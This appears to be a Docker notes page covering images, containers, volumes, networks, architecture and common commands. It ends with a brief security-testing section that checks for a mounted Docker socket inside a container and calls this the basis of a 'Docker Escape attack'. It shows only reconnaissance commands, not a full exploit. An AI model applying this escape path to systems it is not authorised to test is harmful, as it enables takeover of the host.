Docker

Docker is an open-source platform for developers to build, deploy, and manage containers.
Containers are executable units of software which package and manage the software and components to run a service. Unlike virtual machines, containers share the host’s operating system kernel, making them significantly more lightweight and faster to start.

• Docs: https://docs.docker.com/ ↗

Core concepts#

• Images: Read-only blueprints containing the application code, libraries, and dependencies.
• Containers: Runnable instances of an image that provide a secure and isolated workspace.
• Dockerfile: A text file with instructions on how to build a Docker image.
• Volumes: The preferred way to persist data. Since containers are ephemeral (data is lost when they are deleted), volumes store information on the host machine to keep it safe.
• Networks: These allow containers to communicate with each other or the outside world securely. The default driver is the bridge network.
• Docker Compose: A tool for defining and running multi-container applications using a single YAML file.
• Docker Hub: A cloud-based registry for finding and sharing container images.

Architecture#

• Docker Daemon (dockerd): The “brain” of the system. This background process manages all Docker objects, including images, containers, networks, and volumes.
• Docker Client: The primary way you interact with Docker. When you type a command like docker run, the client sends that request to the daemon via a REST API.
• Docker Host: The physical or virtual machine where the Docker Engine actually runs. It contains the daemon, images, and running containers.
• Docker Registry: A centralized storage system for sharing images. Docker Hub is the default public registry, but organizations often use private ones like Amazon ECR or Google Artifact Registry. 

Common Commands#

• docker build -t <name> . : Builds an image from a Dockerfile ↗.

• docker run -p <host_port>:<container_port> <image> : Creates and starts a container with port mapping.

• docker ps : Lists all currently running containers.

• docker stop <container_id> : Gracefully halts a running container.

• docker pull <image_name> : Downloads an image from Docker Hub ↗.

• docker rm <container_id> : Deletes a stopped container.

• docker exec -it [containername] [command] : To run a command inside a docker container:

• Docker engine installation guide: https://docs.docker.com/engine/install/ ↗

• You can also Docker Desktop ↗ to manage docker containers.

• Lazydocker ↗ is a TUI program to manage docker from the terminal.

Security Testing#

The Docker documentation mentions that by default, there is a setting called “Enhanced Container Isolation” which blocks containers from mounting the Docker socket to prevent malicious access to the Docker Engine. In some cases, like when running test containers, they need Docker socket access. The socket provides a means to access containers via the API directly. Let’s see if we can.
try ls -la /var/run/docker.sock. If we can see it, it means we can run access the docker socket from inside the docker container.

 By running docker ps again, we can confirm we can perform Docker commands and interact with the API; in other words, we can perform a Docker Escape attack!